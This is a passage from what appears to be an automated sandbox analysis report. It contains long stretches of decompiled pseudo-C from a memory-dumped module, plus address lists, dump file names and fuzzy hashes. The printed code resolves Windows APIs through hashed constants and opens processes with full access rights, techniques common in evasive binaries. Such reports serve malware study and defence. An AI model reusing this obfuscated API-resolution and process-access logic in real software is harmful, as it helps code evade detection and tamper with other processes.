				E6F02F84C( &_v92, E6F02F4F0(_t329) + 0x10);
				E6F02F4E0( &_v96, E6F02F4F0( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x9a85f5ac;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v100, E6F02F4F0(_t333) + 0x10);
				E6F02F4E0( &_v104, E6F02F4F0( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0x93251419;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v108, E6F02F4F0(_t337) + 0x10);
				E6F02F4E0( &_v112, E6F02F4F0( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x26dec0d0;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v116, E6F02F4F0(_t341) + 0x10);
				E6F02F4E0( &_v120, E6F02F4F0( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xa7a69cc6;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v124, E6F02F4F0(_t345) + 0x10);
				E6F02F4E0( &_v128, E6F02F4F0( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x1a9c1df5;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v132, E6F02F4F0(_t349) + 0x10);
				E6F02F4E0( &_v136, E6F02F4F0( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x77fa1d17;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v140, E6F02F4F0(_t353) + 0x10);
				E6F02F4E0( &_v144, E6F02F4F0( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xabb27594;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v148, E6F02F4F0(_t357) + 0x10);
				E6F02F4E0( &_v152, E6F02F4F0( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xfe904c4d;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v156, E6F02F4F0(_t361) + 0x10);
				E6F02F4E0( &_v160, E6F02F4F0( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0xde72067;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v164, E6F02F4F0(_t365) + 0x10);
				E6F02F4E0( &_v168, E6F02F4F0( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x82fffbdc;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v172, E6F02F4F0(_t369) + 0x10);
				E6F02F4E0( &_v176, E6F02F4F0( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0xdb278333;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v180, E6F02F4F0(_t373) + 0x10);
				E6F02F4E0( &_v184, E6F02F4F0( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0xc380629b;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v188, E6F02F4F0(_t377) + 0x10);
				E6F02F4E0( &_v192, E6F02F4F0( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0xd5e26663;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v196, E6F02F4F0(_t381) + 0x10);
				E6F02F4E0( &_v200, E6F02F4F0( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0xc09bf2f8;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v204, E6F02F4F0(_t385) + 0x10);
				E6F02F4E0( &_v208, E6F02F4F0( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6F0341D8(0xfe338407, _t434);
				E6F02F4E0( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6F02F4E0( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6F02F4E0( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6F02F4E0( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6F02F4E0( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6F02F4E0( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6F02F4E0( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6F02F4E0( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6F02F4E0( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6F02F4E0( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6F02F4E0( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6F02F4E0( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6F02F4E0( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6F02F4E0( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6F02F4E0( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6F02F4E0( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6F02F4E0( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6F021D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6F02B2C0( &_v248, _v256, _t481, _v252, _t318);
				E6F02F864( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xa09bf9c8;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v296, E6F02F4F0(_t410) + 0x10);
				E6F02F4E0( &_v300, E6F02F4F0( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x2b5b930c;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v304, E6F02F4F0(_t414) + 0x10);
				E6F02F4E0( &_v308, E6F02F4F0( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x453267ca;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v312, E6F02F4F0(_t418) + 0x10);
				E6F02F4E0( &_v316, E6F02F4F0( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xb38fc5b8;
				asm("movq [ecx+0x18], xmm0");
				E6F02F84C( &_v320, E6F02F4F0(_t422) + 0x10);
				E6F02F4E0( &_v324, E6F02F4F0( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6F02BA40(_t154,  *_t480);
				E6F02F4E0( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6F02F4E0( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6F02F4E0( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6F02F4E0( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6F02F678( &_v316);
				return E6F02F678( &_v356);
			}

0x6f021494
0x6f021498
0x6f02149d
0x6f0214a3
0x6f0214ab
0x6f0214b0
0x6f0214bc
0x6f0214c0
0x6f0214d2
0x6f0214e8
0x6f0214f3
0x6f0214f4
0x6f0214f5
0x6f0214f6
0x6f0214f7
0x6f0214fa
0x6f0214fe
0x6f021502
0x6f021509
0x6f02151b
0x6f021531
0x6f02153c
0x6f02153d
0x6f02153e
0x6f02153f
0x6f021540
0x6f021543
0x6f021547
0x6f02154b
0x6f021552
0x6f021564
0x6f02157a
0x6f021585
0x6f021586
0x6f021587
0x6f021588
0x6f021589
0x6f02158c
0x6f021590
0x6f021594
0x6f02159b
0x6f0215ad
0x6f0215c3
0x6f0215ce
0x6f0215cf
0x6f0215d0
0x6f0215d1
0x6f0215d2
0x6f0215d5
0x6f0215d9
0x6f0215dd
0x6f0215e4
0x6f0215f6
0x6f02160c
0x6f021617
0x6f021618
0x6f021619
0x6f02161a
0x6f02161b
0x6f02161e
0x6f021622
0x6f021626
0x6f02162d
0x6f02163f
0x6f021655
0x6f021660
0x6f021661
0x6f021662
0x6f021663
0x6f021664
0x6f021667
0x6f02166b
0x6f02166f
0x6f021676
0x6f021688
0x6f02169e
0x6f0216a9
0x6f0216aa
0x6f0216ab
0x6f0216ac
0x6f0216ad
0x6f0216b0
0x6f0216b4
0x6f0216b8
0x6f0216bf
0x6f0216d1
0x6f0216e7
0x6f0216f2
0x6f0216f3
0x6f0216f4
0x6f0216f5
0x6f0216f6
0x6f0216f9
0x6f0216fd
0x6f021701
0x6f021708
0x6f02171a
0x6f021730
0x6f02173b
0x6f02173c
0x6f02173d
0x6f02173e
0x6f02173f
0x6f021742
0x6f021746
0x6f02174a
0x6f021751
0x6f021763
0x6f021779
0x6f021784
0x6f021785
0x6f021786
0x6f021787
0x6f021788
0x6f02178b
0x6f02178f
0x6f021793
0x6f02179a
0x6f0217ac
0x6f0217c2
0x6f0217cd
0x6f0217ce
0x6f0217cf
0x6f0217d0
0x6f0217d1
0x6f0217d4
0x6f0217d8
0x6f0217dc
0x6f0217e3
0x6f0217f5
0x6f02180b
0x6f021816
0x6f021817
0x6f021818
0x6f021819
0x6f02181a
0x6f02181d
0x6f021821
0x6f021825
0x6f02182c
0x6f02183e
0x6f021854
0x6f02185f
0x6f021860
0x6f021861
0x6f021862
0x6f021863
0x6f021866
0x6f02186a
0x6f02186e
0x6f021875
0x6f021887
0x6f02189d
0x6f0218a8
0x6f0218a9
0x6f0218aa
0x6f0218ab
0x6f0218ac
0x6f0218af
0x6f0218b3
0x6f0218b7
0x6f0218be
0x6f0218d0
0x6f0218e6
0x6f0218f1
0x6f0218f2
0x6f0218f3
0x6f0218f4
0x6f0218f5
0x6f0218f8
0x6f0218fc
0x6f021900
0x6f021907
0x6f021919
0x6f02192f
0x6f02193a
0x6f02193b
0x6f02193c
0x6f02193d
0x6f02193e
0x6f021941
0x6f021945
0x6f021949
0x6f021950
0x6f021962
0x6f021978
0x6f021983
0x6f021984
0x6f021985
0x6f021986
0x6f02198c
0x6f02198f
0x6f021991
0x6f02199c
0x6f0219a3
0x6f0219ac
0x6f0219b4
0x6f0219bb
0x6f0219c4
0x6f0219cc
0x6f0219d3
0x6f0219dc
0x6f0219e4
0x6f0219eb
0x6f0219f4
0x6f0219fc
0x6f021a03
0x6f021a0c
0x6f021a14
0x6f021a1b
0x6f021a24
0x6f021a2c
0x6f021a36
0x6f021a3f
0x6f021a47
0x6f021a51
0x6f021a5a
0x6f021a62
0x6f021a6c
0x6f021a75
0x6f021a7d
0x6f021a87
0x6f021a90
0x6f021a98
0x6f021aa2
0x6f021aab
0x6f021ab3
0x6f021abd
0x6f021ac6
0x6f021ace
0x6f021ad8
0x6f021ae1
0x6f021ae9
0x6f021af3
0x6f021afc
0x6f021b04
0x6f021b0e
0x6f021b17
0x6f021b1f
0x6f021b26
0x6f021b2f
0x6f021b37
0x6f021b3e
0x6f021b43
0x6f021b51
0x6f021b55
0x6f021b64
0x6f021b6d
0x6f021b72
0x6f021b79
0x6f021b7d
0x6f021b81
0x6f021b88
0x6f021b9a
0x6f021bb0
0x6f021bbb
0x6f021bbc
0x6f021bbd
0x6f021bbe
0x6f021bbf
0x6f021bc2
0x6f021bc6
0x6f021bca
0x6f021bd1
0x6f021be3
0x6f021bf9
0x6f021c04
0x6f021c05
0x6f021c06
0x6f021c07
0x6f021c08
0x6f021c0b
0x6f021c0f
0x6f021c13
0x6f021c1a
0x6f021c2c
0x6f021c42
0x6f021c4d
0x6f021c4e
0x6f021c4f
0x6f021c50
0x6f021c51
0x6f021c54
0x6f021c58
0x6f021c5c
0x6f021c63
0x6f021c75
0x6f021c8b
0x6f021c96
0x6f021c97
0x6f021c98
0x6f021c99
0x6f021c9a
0x6f021c9d
0x6f021ca0
0x6f021ca1
0x6f021ca2
0x6f021ca9
0x6f021cac
0x6f021cb7
0x6f021cbe
0x6f021cc7
0x6f021ccf
0x6f021cd6
0x6f021cdf
0x6f021ce7
0x6f021cee
0x6f021cf7
0x6f021cff
0x6f021d04
0x6f021d0d
0x6f021d15
0x6f021d2a

Strings

g , xrefs: 6F0217DC

Memory Dump Source

Source File: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, Offset: 6F020000, based on PE: true

Associated: 00000003.00000002.873885896.000000006F020000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873951984.000000006F03A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.873965311.000000006F03D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: g
API String ID: 0-171373902
Opcode ID: af5e251f8f5f85ddfb2fe0ab756628c38d595e8d13aa13d3f8ef51d41d0885a3
Instruction ID: a228b948dabdb72faced72a5313ef1443d4cf00c4acf87f93dfc2b143d46b4e8
Opcode Fuzzy Hash: af5e251f8f5f85ddfb2fe0ab756628c38d595e8d13aa13d3f8ef51d41d0885a3
Instruction Fuzzy Hash: E432B4724047059AC705DF24C851BAFB3E8AFA278DF10471DB4896B1E1FFB1E985C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 6F02A52C, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6F02A52C(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6F02B69C(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6F02F4F4(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6F02F678(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6F03223C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6F02F678(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6F02F5A8(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6F02F5A8(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6f03b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6F03303C(0xfe338407, 0x8a79536f);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6F02F4E0( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6F02F4E0( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6F02B608(_t439 + 0x34);
											E6F02B608(_t439 + 8);
											goto L65;
										}
										L62:
										E6F02B608(_t439 + 0x34);
										E6F02B608(_t439 + 8);
										goto L63;
									}
									_t392 = E6F02F4E0(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6F02CAD0(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6F02C2C4(_t324);
									if(__eflags != 0) {
										break;
									}
									E6F02F84C(_t439 + 0x14, E6F02F4F0(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6F02F4E0(_t439 + 0x14, E6F02F4F0(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6F03303C(0xfe338407, 0xa8c8a645);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6F02F84C(_t439 + 0x40, E6F02F4F0(_t439 + 0x3c) + 4);
											 *(E6F02F4E0(_t439 + 0x40, E6F02F4F0(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6F02CD68(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6F02F4E0( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6F02F4E0(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6F02AC8C(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6F02CD68(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6F02F4E0( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6F02F4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6F02F4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6F02F4E0( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6F02F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6F0338C8( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6F02F4F0( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6F02F84C( *((intOrPtr*)(_t439 + 8)), E6F02F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6F02F4F0( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6F02F4F0( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6F02F4E0( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6F02F4E0( *((intOrPtr*)(_t439 + 4)), _t413);
										E6F0338C8(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6F02F4F0( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6F02F84C( *((intOrPtr*)(_t439 + 4)), E6F02F4F0( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6F02F84C( *((intOrPtr*)(_t439 + 8)), E6F02F4F0( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6F02F4E0( *((intOrPtr*)(_t439 + 8)), E6F02F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6F02F84C( *((intOrPtr*)(_t439 + 4)), E6F02F4F0( *_t439) + 4);
								 *(E6F02F4E0( *((intOrPtr*)(_t439 + 4)), E6F02F4F0( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6F02F4E0(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6F03303C(0x10154545, 0xc2a75cb8);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6F02F4E0(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6F02F84C( *((intOrPtr*)(_t439 + 8)), E6F02F4F0( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6F02F4E0( *((intOrPtr*)(_t439 + 8)), E6F02F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6F02F4E0(_t439 + 0x28,  *(_t439 + 0x70));
										E6F02F84C( *((intOrPtr*)(_t439 + 4)), E6F02F4F0( *_t439) + 4);
										 *(E6F02F4E0( *((intOrPtr*)(_t439 + 4)), E6F02F4F0( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6F02F4E0( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6F02F4E0( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6F02F4F0( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6F02F4F0( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6F02F4E0( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6F02F4E0( *((intOrPtr*)(_t439 + 4)), _t420);
